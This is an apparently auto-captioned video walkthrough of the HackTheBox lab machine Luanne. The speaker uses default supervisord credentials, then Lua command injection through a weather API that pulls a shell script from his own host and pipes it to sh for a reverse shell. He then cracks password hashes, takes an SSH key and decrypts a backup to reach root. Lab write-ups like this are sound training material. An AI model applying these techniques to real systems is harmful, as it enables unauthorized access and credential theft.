HackTheBox - Luanne

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

what's going on youtube this is ipsec we're doing luanne from hack the box which was released as an easy machine but in hindsight probably can be bumped up to a medium uh technically there isn't anything difficult about this machine however there are a lot of obscure things that you just have to understand so if your recon game's not on point you're gonna run into a lot of frustration for starters the application on port 9001 is supervisor d which uses a um not common set of default credentials the username is user and the password is one two three most people may just guess admin admin admin password and things like that so if they don't go to google to find out default credentials for the application there's probably gonna be a lot of frustration the second thing is this whole web app is just a weather api and if you don't understand how to fuzz apis or you don't log into supervisor d to see the actual end point um you can probably run into a lot of frustration trying to figure out just how it works so based upon those two things probably can be bumped up to a medium but let's just jump in and do the machine as always i'm going to start off with the nmap but i'm going to change it up a little bit because we don't know what ports is open i want to start looking at this immediately so i'm going to do a dash dash min rate flag in nmap which is going to set the minimum rate of 10 000 packets per second to the scan which is going to make it go insanely fast so we'll do 10 10 10 to 18 and in like half a second we get three ports already this just scan like the top 1000 ports and it's 22 80 and 9001 so what i'm going to do with this is put it in a regular nmap so sudo and map sc for default scripts sv enumerate versions o a output all formats put in the nmap directory but first that directory has to exist we can call it luanne targeted and then the ip address of 10 10 10 to 18. and the reason why i don't use this min rate too often is because when you do things this fast and things can just miss and when you miss an open port this early in the recon it can really just frustrate you later so i always hate going super fast but every now and then i just want a little instant gratification and see their reports so with that being said let's now do a sleep 300 to sleep for five minutes and then we can just draw in a normal end map of dash p dash 10 10 10 2 18 oh a output all formats luanne dash all ports and this nmap probably should be ran with sudo so again along the fact i don't like running the nmap too quickly i also don't like running nmap multiple times so that's why i did this sleep 300. so hopefully in five minutes this one finishes and this one will kick off automatically and we'll be just on our merry way but very first thing uh let's just take some quick notes let's copy these ports so we know we have them i'm gonna go in this luanne create a new note i'm gonna call it we'll start with o5 and we'll call this enumeration and it's just gonna be nmap and we will put these results and if you're wondering from my previous video this is obsidian and the only change i made to it was i went in settings and changed this readable line length to get back these margins so if you want those mergers elf you just click that we have three ports the easiest one to do some recon on is 80. so let's go over to 80 10 10 10 218 and we get prompted for username password let's try admin admin admin no password admin password uh if we escape out of that we just get this 401 unauthorized error message but it is pointing us to local host port 3000 so what i'm going to do is check port 3000 and we get unable to connect so the port is not listening um it does tell us though that this web application probably isn't just html it's doing something to direct us to a different port so this is either nginx apache or something we can probably figure out what it is by looking at nmap and if nmap's not done we can curl dash v to show us the headers uh the server engine x so engine x is acting as a proxy and forwarding everything on port 80 to 3 000. we can check other pages so we can check like slash dev to see if that exists dot ht access and the interesting thing is when we go to any other page other than index or is it index.html uh we get index.html goes to nginx if we don't give it a directory that's when we get asked for the password so this is weird um i'm going to add a new note and we're going to call this 10 dash engine x 80 and what i'm going to do is just do uh web server on 80 odd behavior we're going to say slash asks for auth no other endpoint does and then let's try other things so we tried hd access the other common one is robots.txt and we see a message saying slash weather it's returning 404 but still harvesting cities doesn't really make sense to me right now but let's add it here i'm just going to curl it so it's a bit prettier so if we just curl robots.txt we can copy this in and then go over to obsidian and put that there uh there we go if we look at this we can see how it looks here um i'm going to change this to be bash just so we have some type of syntax highlighting and it looks better okay so let's check out our admap because that's probably finished looks like it is and we have um more information we can put in our notes so let's go back to the enumeration and we can say bash here for syntax highlighting and paste this uh one day i want to put like a nmap syntax highlighter in this but we can see pretty print there if we look at this it is a open bsd box so netbsd maybe not open maybe it's freebsd or netbsd i don't know bsd that well um os net bsd uh let's see web server is http we got a robots.txt 9001 is medusa httpd is this a hint to like use medusa against port 80 to break into it i don't know exactly what that is but 9001 is also listening on a web server so let's go check out port 9001 uh my favorite port but if we go here we also get stuff let's do admin admin admin password we escape out of this we get message unauthorized so this one is different than uh port 80. so if we look at port 80 10 10 10 218 escape this is the unauthorized cell these are two different applications if we look at this it is the supervisor process manager so i wonder if we google this let's do bsd supervisor process manager and we can say default password see ansible wonder if we google medusa112 maybe this is an actual application let's see supervisor 30a this looks like it medusa112 right here so it looks like we have some type of cve i can't read that let's see default password see supervisor readme password is not sent still trying to figure out this let's check this read the docs page this looks like the user manual to it we search for password uh looks like the default maybe user one two three if we refresh this user one two three does not work oh i'm on the http server we can try it here user 123 and we log in so we have this supervisor 4.2.0 so what i'm going to do is look at metasploit so i'm going to do sudo msf db run and while that does go um we did have something in robots.txt that pointed us to i think slash weather so i'm going to look at it to see if there's anything here and we get 404 not found so going back here metasploit is starting and nmap is still running we probably should have done a dash v here so we could see here report says it found it uh let's search for supervisor and it looks like we got something here xml rpc let's use one and i'm thinking i may not want to use this now i'm looking at the disclosure date it's 2017 and we have 2021 here however the year currently is 2021 so maybe this is just a dynamic value um can i look at versions it doesn't look like it uh let's do user one two three here is there a version number uh like 4.2 4.2.0 uh show options does this say what version is vulnerable 3.0 to 3.3 if we do show targets there's no more targets so this one probably will not work because we're running a different version but i guess there's no harm in trying right so let's set lhost to be ton 0 which is my ip address set our host to be 10 10 10 218 and let's see let's set so anything else we need i imagine a username and password oh http password http username i was looking for like just username password so set http password to b123 set hdb or http user name to be user show options uh let's search for bsd x64 and i will use reverse tcp the reason why i'm switching to this is because the other payload was linux and we want to use a bsd payload because that's what ssh told us okay let's run this and it's not a compatible payload um show payloads does it tell me linux linux linux um generic shell reverse tcp we can try this one set payload this run and see if anything happens but we don't get a session um it's not surprising i'm not going to dig too much into it because again the version says 3.0 and this version says ford.something so let's just take a look at what it shows us we look at memory processes and uptime memory doesn't look too interesting processes we can see something interesting here if we refresh doesn't look like it changes but we do see httpd going to port 3000 and it's using this dash l flag with weather and then pointing it to uh weather.lua lua is a scripting language so hold on one second or just create a note and explain it so this will be supervisor d but lua is a scripting language and we may be able to exploit it knowing that piece so it's pointing here we get this dash l and it's going to port 3000 and here let's do zero zero dash creds put it in here let's keep putting them in the folder i have a bad habit of not putting it in that folder when i create it credentials um i should do it in a table but i hate doing tables supervisor d user one two three we can say service user password did i do this correctly i did not um maybe we need this there we go that looks like it formatted into a table awesome we can clean this up and now we have that maybe say 9001 okay so let's go back to this um we know port 3000 this is the command that starts it and it's specifying dash l weather and it's specifying a script that ends in lua so what lua is let's see what the acronym is so i don't say it um maybe i don't know it's a lightweight programming language it's also what nmap uses um so let's go and fuzz this endpoint if we go back here and curl weather we just get that error message but the robots.txt is telling us it's still harvesting cities so let's just run this with fuff to fuzz this endpoint so we can do f u for url uh dash w4 list opt set list we can do what is it discovery web content raft small words dot text and i probably could have used go buster for this as well there's no real reason i'm using fluff other than like in my mind i see um i'm like fuzzing a api endpoint so i wanted to use buff we get nothing so what i'm going to do is curl 10 10 10 218 slash weather slash test we get 404 not found uh test two we should get something here if we're doing it correctly let's do http and see if this does anything and this doesn't i'm going to switch over to go buster to try it so i'm not sure what i did wrong in that very first request i can probably look up but we see forecast returned um let's see fuzz maybe we could actually specify http in the url maybe that was it because it sent the request it sent 43 000 and we're still on setting now but nothing happened so we got this forecast so let's go over here and copy and then we can go over to our notes for nginx and say slash weather paste that and then we also probably want to specify bash for syntax highlighting so when you look at this it looks pretty so say slash weather buzzing files api so now we want to look at this slash forecast exactly what it returned so i'm going to go back over here and do 10 10 10 218 slash weather forecast to see what we have um no city specified use city equals list so let's do question mark city equals list and we get a list of cities if we do city equals london we get something so we want to fuzz this yet again so i'm going to ctrl c that go back to fuff and we're going to paste the new url and what i'm going to do is change up the word list and we're going to change this to set list fuzzing and then just special characters this is a really quick way to fuzz just random apis you don't understand it sends 32 characters if you look at this word list it's just a list of all the special characters you can do these special characters generally can make applications fail in magnificent ways so that's why we want to run this and we get nothing right off the bat so let's just curl this city command and see what we get with an error message so do asd it returns 500s so we probably want to tell phuff to match with m c 500 to tell it to match the code 500 i thought that's what we'd want to do but we still air out matcher http response 500 uh let's specify http colon i did that mistake yet again so if we don't match 500 the only thing that gives us a 200 is a percent and if we put a percent in here what happens percent unknown city wait what i'm not sure why okay um it just gives a 200 error code with percent but if we match code 200 and 500 we get more output and this is where we want to look at everything that's returning percent is 12 characters uh there are 12 words we probably want to hide everything with either five words or one line i'm going to specify five words first so hw for hide words no it's fw filter words hw is um wfa syntax but dash fw for filter words we'll say five so we're no longer showing anything with five words and we just have three we have plus which is probably getting translated into a space and does nothing uh singletech which gives us nine words and this percent which we already saw so if we put a single quote here we get a weird error a json parse error if we look at the source to this we have lua error attempted to call a nil value now whenever you trigger an error message like that you generally should look up how to do a comment in that language and a comment in lua starts with dash dash so if we do single tick dash dash what happens uh let's send this over in burp suite every now and then i don't know exactly what is actually being sent to the server because this does like url encoding and other magic so prep tweet does not so that's why i always like switching over to burp suite eventually and i think this text is off i really gotta learn zap and switch over to zap because i am not liking this but free let's see user options display hp message let's go to 18 sure and font size let's go to 15. okay that's a bit better so we sent a single tick and dash dash and we still have this nil value thing if we put something here so let's do list tempted to call nil value let's space dash dash dash space i'm not exactly sure what's going on here we can't seem to fix this query but we have done some type of um thing if we put test here anything no so what i'm going to try to do is inject lua and lua has os.execute i believe if it doesn't then i will just um google up how to do command injection with lua i'm pretty sure it's that if we do os execute id we don't get what i expect uh let's try if we sleep sleep is a really cool one so if we sleep for five seconds um we'd be able to tell so we're not getting command execution right yet uh maybe we'd put a colon nope so let's see what can we do let's google up lua command injection because it's been a while since i've had to do this lua command injection go to the first one let's see some text my code and a string inject so it looks like it is well this looks like php um lua execute shell command so let's not look for injection let's just see how to do something so lua os dot execute return value so it this is the command so os dot execute is correct here so what if we just put os dot execute unknown city nil value so what i want to do now is take a step back and just try to make this application work with this single quote uh comment so what i'm going to do is go back to fuff and we're going to do another fuzz but we're just going to put single quote comment to see if anything happens uh we may not want to filter word five anymore let's just run this uh i guess we have to escape the single quote well this works still let's see let's do fw9 and we get a parenthesis is going to make it do something different so let's go back to boop suite and do parenthesis there and we get unknown city so if i do london now we have now completed the syntax so i'm guessing if i thought more about this the variable name would be like uh we're defined like this and what we're doing is just ending that piece by putting this in so now we can begin the next command so let's try os dot execute id and we get a response here so now this is good um the one thing that i don't know about bsd is if we can do a normal reverse shell so if we do bash echo dev tcp 10 10 14 1 let's uh 14 4 send it to 9002 we do nc lvnp 9002 i'm gonna do in a different pane real quick because we have to take notes of what we did there we don't get anything but if i do curl ten ten fourteen two nine thousand one uh nine thousand two maybe have to put a space here and url in code grave curl oh shoot uh 10 10 14 4 not two there we go so let's try this bash again real quick so if we ctrl z all the way here bash at go i was doing 9002. let's url encode this we don't have anything okay that's fine uh let's take a step back real quick and just do fuff so if we copy this go back to obsidian engine x bash and at the end of the video i will go over all the things i took notes on so bash okay and we can go to where is it this one grab this copy paste oh that did not copy well there let's just fix that real quick every now and then i don't know what's going on but my tmux puts a lot of trailing spaces i think is why i'm in edit mode and uh go up so i gotta figure out what's the fix to that there we go just let myself know i trimmed it there we go okay so now we have notes of that and we got to get a shell so what i'm going to do is make the dub dub dub i'm going to go in dub dub dub and we're going to listen on two ports the very first one is just going to be a web service so python 3 http server and then this next one's going to be the reverse shell and we could probably do it without this web server however it's just easier with the web server because we don't have to worry about bad characters url encoding and things like that we just send a request so we're going to curl 10 10 14 4 port 8000 slash shell.sh and we should just see a 404 error that's good we're just confirming that we can get there so now i'm going to go to google reverse shell cheat sheet i misspelled that horribly there we go i love when i can just figure out what i wanted to say i'm going to look for a shell netcat open bsd sounds good so let's grab this and i'm going to create rev.sh and let's change the ipn port so this is going to be 10 10 14 4 and port 9001 okay so now when i hit go on this burp suite window it should hit that shell uh we called it shell.sh it's rev uh move rev.sh and dub dub dub okay so now we can just pipe this over to bash and we got it we just didn't get a shell uh let's try sh no response and there we go we got a shell um i'm guessing bash just doesn't exist on this box if we do find slash to dev null grab for bash uh yeah there is no bash binary here so if you look at where we are when dub dub dub and oh there is a dot ht passwd file in this if we cut this is this gonna be just the user no i was thinking this could be user123 the supervisor d but note we have this web api user and it looks like it is md5 crypted so let's go into the kraken and oh it's actually offline right now shoot um i forgot to power that on before i did this video uh let's do pw let's see if hashcat will crack in a vm uh never really tried this if it doesn't i will go power on my box so we can use it to crack so let's see um hashcat dash dash example hashes uh less md5 crypt it is mode 500 so m 500 uh pw is what i called it and we want to do user sharewordlistrocu.txt and will it start a token length exemption vpw uh let's do user so it was user colon password so i just added user to tell hashcat that the username is before the password and is it actually yeah it looks like it'll just use my cpu so we'll see how long this takes and if it takes too long i'll just give up and go power on my other box well this wasn't intended but i guess we're going to see how well obsidian can recover because if you looked up there um my vm froze as soon as i ran hashcat so this is why i say never run hashcat in a vm because who knows what will happen um also my kraken doesn't appear to be powering back online after i moved it and i probably just have to bring a monitor down and hook it up and hit a key or something so what we're going to do is try to do john and if john doesn't work in this vm then i will run hash cat on my host and show you that but yeah we're just having a little bit issues getting into the cracking piece um hopefully obsidian saves as i go every time like i leave the note hopefully it's saving in the background so we don't have to retype our notes because valuable lesson always save saving is important so we'll resume the video once this vm is booted back up okay here's the moment of truth let's see if obsidian actually recovers my notes and oh it does um i think we got everything um this page may be missing something or maybe i just didn't take a good note here this is running processes and we can say default creds user one two three and we probably should have put the domain where we got this um on read the docs i remember the domain was read the doc something but whenever you say there's a default cred somewhere always provide the link showing yes this is default or on the internet because applications have multiple default creds so it's always good to point it out because sometimes you may think admin password was default when they actually set that which is silly but i digress let's go on and i'm going to try to use john on this so dash dash word list equals user share word list rockyou.txt and do it crack uh no such file dictionary ls user share word list word list has an s on the end there we go and wow it cracks super fast it is i am the best as web api user so let's try ssh in with this so ssh web api underscore user and we can say i am the best at 10 10 10 wait i don't know what i'm thinking there web api user 101010.218 and the password of i am the best uh denied public key so we can't sshn uh we should do a reverse shell and if we took better notes this would be super quick but apparently we don't have a note of this so let's do python3 m http server nc lvnp80 uh 9001. thankfully we do have this rev.sh which does make it easier so we can curl 10 10 10 to 18. weather forecast and it was city is equal to um i'm going to escape the single quote and then we'll do a parenthesis os dot execute uh curl 10 10 i wonder if i should do a space probably 10 10 14 4 port 8000 h pipe it to sh and and comment see put this in quotes attempted to call a nil value so we didn't even get the um anything working there we go i didn't need to escape that so we got a reverse shell and what i'm going to do is notate this so let's copy go to obsidian and we'll say 20 rev shell and we can just paste and say the contents of revdos h is this and what i'm also going to do is put these on each line so it's easier to read there we go so now we have this whereas dub dub dub and inside of vera www there was a credential so we can copy this and then paste that as well okay and we should go over here into our credits table and say question mark it was web api underscore user i am the best i think it was that hd yep web api user so now we have to figure out what this user is if you remember going back all the way to the beginning uh when we first accessed um 127 or the web server it asked for a credential so let's try that uh firefox saved a bunch of pages that's helpful but we can try 10 10 10 218 web api underscore user i am the best and we get a different thing so we can have weather forecast city list so it looks like maybe it's the same thing let's put a single quote uh single quote well no that directed us right where we were so there's nothing different here we're going 218 weather forecast so i'm not exactly sure what this is if we go on this box do a netstat i probably should have done like um dash n to not do dns lookup so let's control c out of that do this rev shell again thankfully super quick because we have um the one liner so let's do which python uh echo path so we have a path python python3 python3 okay python37 exists so i was doing that so we can do python 3.7 dash c import pty pty dot spawn then bash oh we don't have bash then sh does this is going to work sdty raw minus echo fg enter enter does not look like it works at least i have ctrl c now so i don't have tab auto complete but if i control c it doesn't kill my shell um i'll live with that so lsla we got ht pass wd let's do nets dot a n uh let's see netstat a n l p net stat peanut wait netstat dash peanut no no no no okay uh bsd has different arguments than uh linux so that's what i'm struggling with now let's export term is equal to x term can i clear a screen no oh let's see netstat-a-n let's just go look at this we can do netstat a n grep for listen and we do have another port we have three thousand one so we have three thousand three thousand one if i do ps ef uh maybe aux w there we go let's see ps dash aux w grep 3001. we can see how this one is started so we have a dash u flag uh we have dash u here x s dash i let's see this one is running as our michaels so what i'm going to try to do s u r dot michaels i did rms yeah r dot michaels i am the best can authenticate okay so let's see we have to get the rest of this output and it's truncating something because this weather went longer so i'm gonna do is go back to this 9001 thing to see if this can help me so if we go 9001 user 123 we do processes is 3001 even here it is not refresh i don't know user one two three i'm not sure exactly how this process thing is running but we're not getting all the processes if i tail standard out do we get more okay we have the rest of 3001 i'm sure there's probably a way we could have done like some terminal magic to get more stuff out of here but wasn't sure and i see it here uh i wonder if dash is here no so we got this and we can look at all the arguments uh we have home our michael's web api weather.lua so if we cap this permission denied dash p this is going to be the pid of this web server you probably the user to run it as are michael's and b the directory and we can't get into this directory right curl slash i don't know i did curl slash yeah permission denied uh we can do a curl and go back to our one liner so if we go back to this rev shell go to curl and we're going to change this os.execute to be something else let's see let's just copy this piece girl 12701 3001 okay weather forecast id like that uh caprara quotes curl double quote okay um it doesn't look like we have this command injection anymore so let's see we can do let's go back here man on http um h let's see net bsd httpd uh net bsd http d let's see i want to look at all these arguments so what arguments are different between these two web servers where is it come on okay so let's copy this command go to supervisor d and we can paste that and then i also want to look at this to see how these arguments are different so we got u s x i 127 so the differences are going to be uh let's see dash i port is different the l is the same uh location of lua and then let's see we have a dash p so we specified pid we don't have a pit here so dash p pid dash u user and dash b home directory so these are three things i want to look at the port difference not really of interest but i want to see how this user and home directory parameter works because we may be able to have something here and then if this doesn't work we're going to go back to fuzzing the um this thing the reason why i didn't is because i'm lazy we don't have ssh here so i'd have to copy a program that does like a proxy so i can access port 3001 on localhost so i don't feel like copying any programs over just yet um trying to think what the program name is i'm drawing a complete blank it is uh chisel um chisel is what i was looking for so let us um go and find this so we want to look at netbsd thing and i don't know if this was it because this doesn't have all the flags we want um oh yeah it does here we go that's you so username uh causes hdb switch to the user and the groups of using them after initialization it's like dash t so nothing interesting there let's go to b as b home directory uh let's see dash b enables daemon mode cell b is probably background so it's background switch to user we're going to look at dash p next let's see dash p public directory so that's not damon that is public directory directory so that was going wait if i look at lowercase yeah this is pid uh lowercase p would be that uh let's see the port nothing interesting there let's look at these other arguments dash u x and s so dash u dash x dash s always important to know what is running let's see dash u enables transformation of uniform resource locators oh that's where we actually can access users home directory um and birthdays had it right let's see this is 3000 dashio yup so enables user dir x directory indexing so dir indexing this is like that um if you go to a page that doesn't have index.html it just lists all the directories the last one we want is dash s c logging so this is logging to stder so right now this user directory is interesting to me we have a shell on the server now so we can cat etsy passwd and look for the users on the box which is probably just root weird there's a tor user dash tour okay i came in seo okay um i'm not sure if that's a default user or that's just what i'm used to seeing like a backdoor user um i'm guessing it's a default user because it's born again like if a back door is created they probably wouldn't create that description uh let's do our michaels so girl 10 10 10 2 18 slash i copied a bunch of antsy characters are michaels not found let's do root not found let's try 3001. crawl localhost 3001 r dot michaels unauthorized so that's different let's do the web api user so is it curl dash dash user web api underscore user the password of i am the best i think that's how you do users in curl and we get a page so we have a directory listing index of our michaels and the reason why this one probably worked is um it's running as our michael so it has the permission to is my guess because we're running as nginx and nginx or the oh we can get root but the other nginx server probably just doesn't have permission to any of those directories uh root doesn't exist okay so we can get this id rsa so let's copy this i'll just copy the whole thing and we'll go to rev shell we may want to create another one actually and say 25-3001 i kind of regret saying i'm going to start taking notes as i go because taking notes live on videos just i don't know why but it's painful let's go over here and call this let's do id rsa and we get an ssh key so let's try using this ssh key i'm copying it and this will finally let us get away from this reverse shell which will give us the up arrow so let's v r dot michaels paste the key chmod 600 s h dash i the key r dot michaels at 10 10 10. 2 1 8. gonna let me in it is so welcome to net bsd uh we can get the user.txt and if we look at this there is a gnu pg directory if we go in there it's just some key rings so let's try um do as which is bsd's sudo if we do do s who am i it requires a password we don't have a password we can try i am the best again and authentication failed but there is this backups and develop directory so let's go into backups i just don't have tab complete that's annoying uh cd dot cd i do have back tab auto query i was just in a directory we have this tar file that is encrypted and if we look at devel let's go web api do we have any other cadentials lessweather.lua i don't see any passwords go www index visit.htpasswd and this is the web api user that we got before so nothing interesting here that's all that it's in that directory i guess both web servers run here the 3001's web api and 3 000 www or something so we have to figure out how to deal with this tar file and i'm guessing it's just encrypted based upon it's saying dot enc on the end if we do a file against it we just get data we don't get tar if i do history uh it's just showing my history so let's see netbsd encryption see cryptographic device netbsd encrypt file we got net pgp so we can try net pgp decrypt and this may work because we just have the gnu pg keys in our home directory so let's do net pgp decrypt the file name temp let's see temp test can't open where was it was it do we do it the other way do we do decrypt that just go to sandra out let's see dash dash decrypt dash output equals so let's do dash dash output slash temp backup dot tar dot gz cd slash temp dash ze xvf and we got exactly what we had before devel dub dub dub is this file different the passwd diff dot passwd or hd passwd and home what was it our michaels devel web it's devel dub dub and then dot ht passwd so these are different files so let's just try decrypting this one or cracking it so grab this v pw paste this john i don't have that so john pw word list is equal to user share word list rocky.txt and we get the password of little bear so if we do do as who am i little bear we get root so do as sh little bear and we are now root so hope you guys enjoy this box take care and i will not see you next week yet because we have to fix these notes so let's see web api user we have r.r michaels so this is ssh uh let's see local we'll call this bsd os os is the type of credit is little bear and this is web and password i'm going to do description i'm going to say default grid this one was in hd pass wd and this is an encrypted backup hd passwd okay we look at this maybe it doesn't like the periods oh dash dash that there we go so now we look at this page good enumeration uh we should probably go or we do have a map of everything so this 9001 also web port so we can say 9001 running medusa supervisor server default creds of user123 okay nginx so the very first thing on the nginx server we noticed odd behavior um slash asked for authentication when no other endpoint did and this is showing it so robots.txt says weather exists okay and then slash weather we fuzz this api um the reason why we fuzz this api was based upon supervisor d and the robots.txt so um looked for api endpoints underneath slash weather based upon robots text and supervisor d okay and let's see we can always snip this header out real quick and this is found forecast this one is injection so we found injection within weather forecast and here we have what is this one um identifying ballot injection payload so the reason for this one is we fuzzed with a single quote and a comment to find out how to close off this because we're trying to um get the single quote to not kill the application so get do not error the app there we go okay supervisor d we got default creds we only just said read the docs we can probably now go here read the docs not that one pdf latest okay so we can say read the docs give them a link and then we also would probably want to do password and go here and print screen copy this uh before we do that we should probably highlight where the password is so like that there we go and paste the password okay running processes see two interesting processes had to tail stdl and supervisor d to see this and this one is httpd argument descriptions okay the rev shell and then this kind of where notes fall apart so let's see getting a shell this is contents of revdos h location of dot ht passwd and let's see this one is um getting our michael's sh key the password is from let's see hd passwd readable by nginx and then with our michaels the last thing we did was have to decrypt so if we do lsla on home we can say oh we're still root lsla on gnu pgp lsla home gnu pg we have key rings so let's see create a new thing uh 30 are michaels and we did um gnu pgp key okay and then with that key we could decrypt backups so ls um so if we go backups [Music] i'll just do was it was the command we did diff there we go [Music] so we can copy this so this very first one is user has pgp keys these pgp keys decrypt a backup user's password is in hd passwd so really bad notes for this one but at least we have notes i guess uh only took one picture that feels low but hopefully as i do notes more throughout these videos um we take better notes eventually and you'll get to see me improving my process of note-taking because this one we didn't really do a great job but we still took them uh i'm going to try counting this to all.md and let's see if we export this as pdf what does it look like so export to pdf sure sure places oh it opened it for me so we can see notes for everything we took um not the best notes definitely not good enough for a blog post but it's better than not having anything so hope you guys enjoyed that take care and i will see you all next week

Info

Channel: IppSec

Views: 22,244

Rating: undefined out of 5

Keywords:

Id: -KxvC3NY0Wo

Channel Id: undefined

Length: 67min 17sec (4037 seconds)

Published: Sat Mar 27 2021